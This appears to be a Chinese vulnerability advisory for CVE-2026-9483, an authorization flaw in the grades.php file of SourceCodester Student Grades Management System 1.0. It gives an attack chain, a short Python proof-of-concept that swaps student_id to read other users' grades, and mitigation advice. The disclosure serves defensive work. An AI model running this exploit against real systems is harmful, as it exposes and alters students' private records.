CVE-2026-9483 CVSS 6.3 中危

CVE-2026-9483 SourceCodester成绩管理系统授权不当漏洞

披露日期: 2026-05-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-9483

漏洞类型

权限绕过

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

SourceCodester Student Grades Management System

漏洞概述

SourceCodester Student Grades Management System 1.0版本存在授权不当漏洞。攻击者可利用grades.php文件中student_id参数的验证缺失，通过网络远程发起攻击，绕过身份验证获取或修改敏感数据，影响系统的机密性、完整性和可用性。

技术细节

该漏洞源于grades.php文件在处理student_id参数时未实施有效的访问控制检查。系统未验证当前会话用户是否具有查看或修改特定学生成绩的权限，导致低权限用户可以通过修改请求中的student_id参数值，直接访问本应受限的功能接口。攻击者利用此漏洞可以遍历学生ID，读取、篡改或删除任意学生的成绩信息。由于攻击向量为网络且无需用户交互，利用门槛较低。

攻击链分析

STEP 1

侦察

识别目标系统为SourceCodester Student Grades Management System 1.0，并确定grades.php接口位置。

STEP 2

获取低权限账户

注册或获取一个普通学生账户，获得有效的会话凭证（满足PR:L要求）。

STEP 3

漏洞利用

使用该账户向grades.php发送请求，篡改student_id参数为目标受害者的ID，试图访问未授权数据。

STEP 4

数据窃取/篡改

成功获取目标学生的成绩信息，或利用同一接口提交恶意数据进行篡改。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_vulnerability(target_url, session_id):
    """
    PoC for CVE-2026-9483: Improper Authorization in grades.php
    """
    # Target endpoint
    endpoint = f"{target_url}/grades.php"
    
    # Cookies simulating a low-privilege logged-in user (PR:L)
    cookies = {
        "PHPSESSID": session_id
    }
    
    # Payload: Manipulating student_id to access another user's data
    # Assuming ID 1 is an admin or another student
    params = {
        "student_id": "1"
    }
    
    try:
        response = requests.get(endpoint, params=params, cookies=cookies, timeout=10)
        if response.status_code == 200:
            print("[+] Potential vulnerability confirmed!")
            print(f"[+] Response content snippet: {response.text[:200]}")
        else:
            print("[-] Exploit failed or endpoint not reachable.")
    except Exception as e:
        print(f"[!] Error: {e}")

# Usage
# check_vulnerability("http://target-ip", "valid_session_cookie")

影响范围

SourceCodester Student Grades Management System 1.0

防御指南

临时缓解措施

建议立即在业务逻辑层添加身份与资源归属校验，确保当前登录用户ID与请求的student_id一致。若无法立即修复，建议通过WAF添加规则，拦截对grades.php的异常参数请求，或暂时限制系统仅在内网访问。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-9483
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-9483
3 Details https://www.cvedetails.com/cve/CVE-2026-9483/
4 VulDB https://vuldb.com/cve/CVE-2026-9483
5 Link https://github.com/Jack-MRJ/Student-Grades-Management-System-Vulnerability-Report
6 Link https://vuldb.com/submit/814037
7 Link https://vuldb.com/vuln/365464
8 Link https://vuldb.com/vuln/365464/cti
9 Link https://www.sourcecodester.com/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表